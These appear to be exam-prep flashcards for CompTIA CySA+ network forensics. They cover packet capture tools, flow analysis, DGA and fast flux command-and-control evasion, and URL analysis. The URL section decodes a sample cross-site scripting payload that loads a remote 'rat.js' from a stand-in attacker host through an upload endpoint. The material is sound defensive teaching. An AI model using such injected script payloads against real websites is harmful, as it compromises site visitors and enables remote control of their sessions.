CS0-003 Section 6: Network Forensics
Studied by 0 people
Learn
Practice Test
Spaced Repetition
Match
Flashcards1/20
There's no tags or description
Looks like no tags are added yet.
Name | Mastery | Learn | Test | Matching | Spaced |
|---|
No study sessions yet.
21 Terms
[Network Forensic Tools]
Network related indicators of compromise can be gathered from packet captures, traffic flow data, logs and alerts
network traffic must be captured and its data frames decoded before you can analyze it.
To help with this, we use something called a Switched Port Analyzer or a SPAN
SPAN/mirror port
allows for the copying of ingress or egress communications from one or more switch ports to another.
Essentially, it makes a copy of everything coming in or out of a port, and then puts that on a duplicate port so you can then monitor it.
This can be done using your switch or routers configuration as you see here on the screen
packet sniffers
[network forensic tools]
once you have a SPAN port configured, you're going to have to enable packet sniffing, and you do this with a packet sniffer
any piece of hardware or software that records data from frames as they pass over the network media using methods such as a mirrored port (like a SPAN port), or a TAP device.
TAP devices/network that → could be something that looks like a hardware device,
both passive and active versions of these devices where they can collect the data going over the network from any network cable segment,
if you're going to do it using a hardware device, or you can use software connecting it through a SPAN port.
also consider, where are you going to place them in your network.
Generally, you want to make sure your network sniffer is placed inside the firewall, or as close to an important server as possible.
because you want to be able to identify malicious traffic, and as specifically the traffic that's getting in through your firewall.
If you put it outside the firewall, you can become quickly overwhelmed with all the data that's coming at your network.
you don't have to have just one sniffer.
You can put multiple sniffers on your network at different positions.
i.e. you may have one that's right behind your firewall or your router that is going to collect the bulk of the information for the network.
But, if you have a single device that you're really worried about, you can put a sniffer right in front of that device.
i.e. maybe your database server. And that would give you additional monitoring that has much less data that you're looking at, just what's going to and from that database server,
so it'll be a smaller sniffer, and allow you to look at that much more closely.
[tcpdump]
performs a sniffer function to perform live packet capturing
you can also use them afterwards to do an analysis of the PCAP data that you've been saving all of that packet capture
a data network packet analyzing computer program that runs under a command-line interface.
And it allows the user to display TCP/IP and other packets being transmitted or received over the network to which the computer is attached.
You can then dump all that information into a file called a PCAP file or packet capture file for later analysis
Unlike Wireshark, tcpdump is a text-based program and you use it inside the command line.
It comes installed by default inside Mac as well as in Linux.
need to know what interface you’re connected on
must be running this with administrative permissions to be able to turn your card into promiscuous mode
sudo tcpdump -i [your interface “e0“, “eth0“]
shows me all sorts of different connections that are happening on this network both from my computer and other computers on the network
ctrl+c
will pause and cancel the session
sudo tcpdump src [ip]
if you want one device over the network
…..[prev command] -w [filename].pcap
Now, that information is going to go into a file that's going to be captured on my hard drive.
As it's sitting there listening, it's picking up any traffic
that's going from that source and it's writing it to the file
sudo tcpdump -r [filename]
pulls up file with logs in terminal
sudi tcpdump src port 5475 -r [filename]
filters by ‘src’ port
put -r filename for the saved logs, not live data
sudi tcpdump src port 5475 -r [filename] -x
shows details of the command in both hex and ASCII
man tcpdump
[wireshark]
performs a sniffer function to perform live packet capturing
a free and open source GUI-based packet analyzer that is used for network troubleshooting, analysis, software and communication protocol development, and further education
open pcap file
middle section after selecting a packet shows the first frame
frame → layer two; data layer
layer two data: MAC addresses, ethernet (L2 protocol)
IP → L3;
src, dst ip addresses
tcp or udp → layer 4
right click - follow the strem
shows what the webpage looks like
of ftp, change doc type to try to decrypt the original message
TELNET tells you what the client and the server did
follow stream
[flow analysis]
full packet capture → capture the entire packet.
This includes the header and the payload for all traffic that is entering or leaving your network.
this would be a ton of information and quickly eat up all of our storage.
use flow analysis using a flow collector instead
flow collector → a means of recording metadata and statistics about network traffic rather than recording each and every frame that's going over our network.
This allows us to use flow analysis tools that provide network traffic statistics sampled by the collector.
This way we can capture information about the flow instead of the data itself, saving us a lot of space
But we aren't going to have the contents of what was going over the network, just information about it
this information can be stored inside of a database and queried later by our different tools and procuce reports and graphs
allow us to highlight trends and patterns in the traffic being generated.
It allows us to get alerts based on anomalies that we might see and different patterns and triggers that we might see.
We can also have visualization tools that allow us to
quickly create a map of different network connections and the flow patterns,
and we can identify different traffic patterns that might reveal bad behavior, malware in transit, tunneling, and other bad things out there
tools
NetFlow
Zeek (bro)
Multi Router Traffic Grapher (MRTG)
NetFlow
[flow analysis]
a Cisco-developed means of reporting network flow information to a structured database.
one of the first ones out there, and eventually it actually became the standard that everyone started using under the name IPFIX (IP Flow Information Export)
Now, this allows us to define a particular traffic flow based on the different packets that share the same characteristics.
i.e. maybe it's the same source and destination IP signifying that there's a session between two hosts.
That would be one data flow, and we can get information about it.
Now, some of the information we can capture inside of NetFlow is going to be information about the packets that go over the devices, things like
the network protocol interface that's being used, the version and type of IP being used, the source and destination IP address, the source and destination port, or the IP's type of service.
All of this information can be gathered and then we can actually analyze it and look at it visually using different tools.
i.e. you can see that I'm using the SolarWinds tool to show the NetFlow data of a network, or you can look at it in a text-based manner.
here you can see the different flows that are there going from one all the way down to flow 15, and as I increase the ability to look into flow 15, you can see the source and destination address, the source port, the destination port, and some basic information about it,
but you don't see the content of any of those packets that have been going through.
Now because of this, NetFlow is going to provide you with metadata
but you're not going to have the full packet captures,
so you're not going to have a complete record of what's happening.
Zeek
[flow analysis]
if you want to be able to have the best of both worlds,
metadata and packet capture (complete rocord of what’s happening)
a hybrid tool that passively monitors your network like a sniffer, but it's only going to log full packet capture based on data of potential interest
So essentially it's going to be sampling that data just like NetFlow does, but when it finds something that's quite interesting, it's going to log the entire thing, so we can then go back and look at that.
This helps reduce our storage and our processing requirements, and it gives us an ability to have all this data into one single format.
One of the great things about Zeek is that it performs normalization of the data and then it stores that data as a tab-delimited or JSON-formatted text files.
This allows you to use it with lots of other different tools.
i.e. here you can see that since this file was normalized, I could import it into another tool for visualization, searching, and analysis.
In this image, I've imported the Zeek log into Splunk and from there I'm able to search for specific information during my analysis of a potential incident
MRTG
[flow analysis]
a tool that's used to create graphs that show network traffic flows
through the network interfaces of different routers and switches by polling those appliances using SNMP, the Simple Network Management Protocol.
This looks like this graph here on the screen.
Now, what is useful about this?
you can see patterns emerging.
ie. in the top graph on the router firewall, where do you see a big spike in traffic?
You can see that there's a big spike in traffic between 2:00 and 4:00 am. Now, is that normal? Maybe and maybe not, but it's something we should go and further analyze, because if we see a big spike between 2:00 and 4:00 am, that could be something normal, like we are doing offsite backups, and therefore we're going to do that during off-peak hours, and you'll see a big spike in traffic as we're sending our data to our offsite facility.
Maybe that's a reasonable explanation, or maybe the server has been infected with malware and at 2:00 to 4:00 am when we're all home sleeping, they're sending all the data back to the bad guy who's now collecting our data as part of data exfiltration.
We don't know just by looking at this which of those two cases it is, but by looking at this we can identify that we should zero in between 2:00 and 4:00 am and figure out what was that additional traffic flow that happened and why.
So based on this, we might make a hypothesis that we think data exfiltration is happening.
In that case, we would want to set up a network sniffer in front of this server
to see what traffic is leaving and where it's going to.
Based on that, we can then dive deeper to see if it was something that was known good, such as a backup, or known bad, such as a bad guy.
[IP and DNS Analysis]
many intrusions rely on C2 servers for the attack to download additional attack tools and exfiltrate data.
Therefore, one of the particular areas of interest to a cybersecurity analyst is to analyze traffic for any access request to an external host.
If you can identify these, usually you're going to be relying on the analysis of an IP address and their DNS resolutions.
If you subscribe to a service that provides reputation-based feeds, most of these are going to be based on IP and DNS as well.
Now, in the old days, malware used to be configured to contact a specific static IP or DNS name as part of its code.
So when that malware was downloaded and installed, it would call out to a specific static IP or DNS name.
Now, because of that, we would be able to develop what we call
a known-bad IP address.
an IP address or range of IP addresses that appears on one or more of our block lists, and these block lists were a way that we could basically play whack-a-mole.
A bad guy would start a new domain, we would find out it was bad, we would put it on the block list.
They would start another domain, and we'd keep doing this over and over.
This is how reputation-based risk intelligence is done to create an IP or URL block list. We find something bad, we add it to the list.
And so here you can see on my block list is a thing called bol.com.br, and you'll notice that it's listed as a RAT that's been associated with this particular DNS.
Now, that's great, and that means that we can block this but if they change their domain name, we're now going to have to go find that and block that too.'
As defenders, we try to outsmart the bad guys, but every time we find a way to block them, they find another way to get around it.
And because we started using a lot of block lists and blocking known-bad IPs and known-bad DNS, they started using what's known as domain generation algorithms to overcome those block lists
DGA
[IP and DNS Analysis]
a method used by malware to evade block lists by generating domain names for command and control networks dynamically.
Instead of having a static IP or a static name, they can create ones and pick from a list of a lot of them, and then keep moving through those until we block them all, and then they'll just create more.
And they keep doing this over and over dynamically.
Let's talk about how this works. There are five steps for an attacker to use.
1 attacker sets up one or more dynams dns (DDNS) servers
This allows them to be able to have domain names that can be automatically generated on the fly.
When they do this, they'll sign up with a service using fake payment or fake credentials, or they might use some host that really doesn't careif they're doing illicit activity.
2 malware code implements a DGA to create a list of new domains
this is where the malware code is going to implement the DGA.
This DGA is then used to create a list of new domain names.
Now, the way this works is
it's an algorithm, and it will use some kind of value to seed it
and then that algorithm, everybody who has it, knows what that initial seed is has the same key essentially to be able to use the same list.
So if the piece of malware has it and their server has it, they both will have the same dynamically allocated names that they can jump to each time.
The way this works is essentially like an algorithm that uses some kind of a seed or a random number or a time-based or something like that.
i.e. we might have a start date that we're going to use and that is going to be the seed.
as we use that, it's going to create an output of a bunch of cryptic strings that basically have numbers and letters to make up domain names.
this way, they're all randomized, and they won't already be part of your block list.
3 a parallel DGA is used to create name records on the DDNS service
So now that we know what the malware is going to use, we also need the DDNS service to have it so those two can match up,
and again, if they both use the same seed, they're going to have the same matching names.
4 the malware tries a selection of the domains it has created to connect to C2
This is in case the seed was off by a little bit, hopefully they'll still match up, and they'll be able to make that connection.
5 C2 server communicates with a new seed for the DGA to prevent being blocked
that way they can change that DGA in case you reverse engineered it and tried to block their attempts.
This way, they can prevent themselves from being blocked and continue to do bad stuff.
It's this dynamic list that is constantly changing.
Now, because it has this constantly changing architecture, this is often known as a fast flux network.
fast flux network
[IP and DNS Analysis]
a method used by malware to hide the presence of C2 networks by continually changing the host IP addresses in the domain records using domain generated algorithms.
Essentially, everything we just talked about with DGA, that is part of a fast flux network.
detect and mitigate a DGA
[IP and DNS analysis]
what can we do to detect a DGA?
1 if you start seeing a lot of call outs from your systems to random IP addresses that look something like this.
i.e. you see this random series of letters and numbers.com.
That is a great sign that you are dealing with some sort of computer generated labels with some kind of constant to value ratio that just doesn't look right.
Most people wouldn't buy a domain name like A1ZWBR93.com.
They would buy diontraining.com or comptia.org or something like that.
So if you see things like this, it's usually a sign that there's something malicious going on.
2 if you start seeing a high rate of NXDOMAIN errors when you're resolving to DNS in your logs,
NXDOMAIN error
have you ever gone to a website and you got a message that looks like this? it says, "This site cannot be reached. DNS probe finished NXDOMAIN."
essentially, you've tried looking up that domain name and you can't figure it out.
that's when you can't get the DNS resolver to resolve that DNS for you.
And if you're using something like a dynamic DNS like this with a fast flux network, often they're already moved off of that domain and onto another one and so you're going to get an NXDOMAIN error.
Now, how do you mitigate these DGAs?
use a secure recursive DNS resolver.
This is going to allow one trusted DNS server to communicate with several other trusted DNS servers to hunt down the IP address and return it to the client.
So instead of going out to a generic DNS service to be able to get those domain names to IP resolutions, you should be using a trusted DNS server that uses recursive lookup.
If you do that, and they maintain a knowledge of what type of DGAs are out there, they will constantly blocking those for you and help protect your network.
[URL Analysis] 1/
URLs have the ability to encode some of action or some data and that can then be submitted to the server during the request.
When you conduct a URL analysis,
this is basically just an activity that's performed to identify whether a link is already flagged on an existing reputation list
and, if not, to identify what malicious script or activity might be coded within it.
important because there's some encoding that can happen inside the URL,
so you need to use the right tools to be able to resolve that percent encoding that might be there, assess what sort of redirection the URL might be performing
and showing the source code of any scripts that are called by the URL without executing them.
you want to do all of this inside a sandbox environment so you don't infect your own machine.
[URL Analysis] 2/
diontraining.com/upload.php?post= [and then this long thing]
we're going to come back to this URL quite a few times, but first, before we start analyzing it, we really have to understand some basics of URL analysis.
three things
HTTP methods
HTTP response codes
percent encoding
HTTP methods
[URL Analysis]
a set of request methods that indicates the desired action to be performed
for a given resource.
a resource is essentially something on the server
It could be a webpage, an image, a file, etc
Now a request is going to contain
a method, a resource, a version number, the header, and the body of the request.
We put all that information together when we send something out through a URL.
So when you go to diontraining.com, you are actually sending an HTTP method saying,
"Please, go to this website, get the page, and send it back to me with the body and the header." And that's what our server does.
Now there are many different methods
GET → the principal method and it's used to retrieve a resource.
So again, when you go to diontraining.com, you are using a GET saying, "Get me that page, get me the index page of that website."
POST → this is what you saw in the URL I showed you earlier
used to send data to the server for processing by the requested resource.
So in the example I had, it was the upload.php file and the action was POST
So we were sending data to the upload.php file, which is a script, that would then be run on that server.
PUT → creates or replaces the requested resource.
So if I put a file on the server, I'm going to upload it there and overwrite what's existing.
DELETE → used to remove the required resource
So if I wanted to delete a file,
HEAD → retrieve the headers for the resource only and it's going to ignore the body
So if I send out the HEAD command to the server, I'm only going to get the head portion of the HTTP request.
This is often used as a penetration tester when you're doing a banner grab
Because all you want to know is information about the server and about the page, like the title of the page
[URL Analysis] 3
data can be submitted via a URL
and it's going to be delimited by the question mark character.
You saw earlier when I had my upload.php, there was a question mark there that then said post=,
and that was saying, "For this resource, I want to do this next thing, I want to post."
Now you also have query parameters
usually going to be formatted as one or more name=value pairs, and they're going to use an ampersand delineating each pair
So if you think back to our Google hacking lesson,
we used the ampersand to connect different value pairs together as we sent them to Google to do a specific search.
a hashtag
used to indicate a fragment or an anchor ID and it's not actually processed by your web server.
If you've ever coded HTML, you'll know that you can use a hashtag to say this is a particular part of the page.
For instance, if a page is longer than what can fit on the screen,
maybe you have a very long book that's in one webpage, I can actually have a hashtag to show where those anchor points are for each chapter.
And then when you click a link at the top of the page, it would take you directly to that portion of the page and jump down.
Again, it's not processed by the server, but you should be on the lookout for these as part of your URL analysis because sometimes people will misuse that hashtag and inject JavaScript into your page by using that as part of the URL.
HTTP response codes
[URL analysis]
when you deal with an HTTP response code, the header value is going to be returned by the server when the client requests a URL.
And these different codes are numerical codes, usually three digits,
that are going to tell you some information that the server wants you to know.
200
indicates a successful GET or POST request meaning you went and got the page and it came back to you successfully.
201 indicates that your PUT request has been successful in creating a resource.
300,
indicate a redirect has occurred by the server.
there's a 301 redirect that we use when we move a webpage from our site to a different site.
So that way we tell Google that we want all that information they know about that old page to be transferred to the new page.
400 series,
indicates that you're going to have an error in the client request,
and there's some specific ones here that you should know.
400 itself is going to indicate that a request could not be parsed by the server.
401, this indicates that the request did not supply the authentication credentials.
403, this indicates that the request did not have sufficien permissions to access that thing.
404, indicates that the client has requested a non-existent resource.
500
means that there is some kind of a server-side issue.
Everything up to this point was really a client not getting what they wanted.
Now we have some server-side issues.
A 500 is going to indicate a general error on the server side of the application.
A 502 indicates a bad gateway, and you'll often see this when the server is acting as a proxy.
A 503 is going to indicate there's an overloading of the server, and that's going to be causing service unavailability.
And a 504 indicates that gateway timeout has occurred; this means there's some kind of an issue with the upstream server.
percent encoding
[URL analysis]
a mechanism to encode eight-bit characters that have a specific meaning in the context of a URL.
This is also known as URL encoding
Now a URL can contain unreserved and reserved characters from the ASCII set.
Unreserved characters
things like letters and numbers, A through Z, zero through nine.
It's the dash, the period, the underscore and the tilde.
reserved characters
special characters like the colon, the that forward slash, the question mark, the hashtag, the brackets, the at sign, exclamation, dollar sign, ampersand, single quote, parentheses, star, plus, comma, semicolon, and equals.
You can use these inside of a URL.
There's nothing wrong with using them, but they do have a special meaning.
a URL can not contain any unsafe characters
things like null string termination, carriage returns, line feed, end of file, tab, space, and things like the forward slash, the less than sign, the greater than sign, and the curly brackets.
percent encoding is going to allow a user agent to submit any safe or unsafe character, or any binary data for that matter, to the server within a URL.
So if I want to send a space, I can do that if I encode it with one of these percent encodings.
here's where I need to bring up the warning
percent encoding can be misused to obfuscate the nature of a URL.
This allows them to encode unreserved characters and submit malicious input as a script or binary, or some other method like that, to perform directory traversal and other bad things.
So when you see percent encoding, you probably should think to yourself, "There's probably something being hidden here. I need to look further into this."
As an analyst, whenever I see that or on the exam, anytime you see that, you need to have the hair on the back of your neck standing up and going, "I need to look further into this. There's probably something here."
double encoding
[URL Analysis]
some really tricky attackers have started to do what's called double encoding,
by encoding that percent sign, too.
So when you're looking at the URL you won't see something like %20 even though that thing will be percent encoded.
for the exam, they won't do the double encode,
percent encodings
%3C = <
%3E = >
%20 = space
%3D = ‘=‘
%22 = “
%3Cscript%20SRC%3D%22http%3A%2F%2Fabc123.com%2Frat.js%22%3E%3C%2Fscript%3E.
<script SRC="http://abc123.com/rat.js"></script>
essentially we're including a script tag that points to a JavaScript file located at http://abc123.com/rat.js.
If the target website is vulnerable, this could allow the script to execute and perform potentially harmful actions.
So by sending this URL, we are telling diontraining.com to access the file, upload.php,
and post or attempt to upload this script tag, which links to an external JavaScript file.
If the website was vulnerable, we could end up executing malicious code inside of this JavaScript.
[Conduct Packet Analysis]
basic packet analysis using Wireshark
To do this, I'm going to
launch a piece of malware on my system and we're going to see how it beacons out over time.
use two pieces of software
Proc Man to look at the processes and make sure the malware's actually launching.
And then I'm really going to dig into the packet analysis using Wireshark so we can look at how those packets are going out, to what IPS they are, so we could develop indicators of compromise
trickster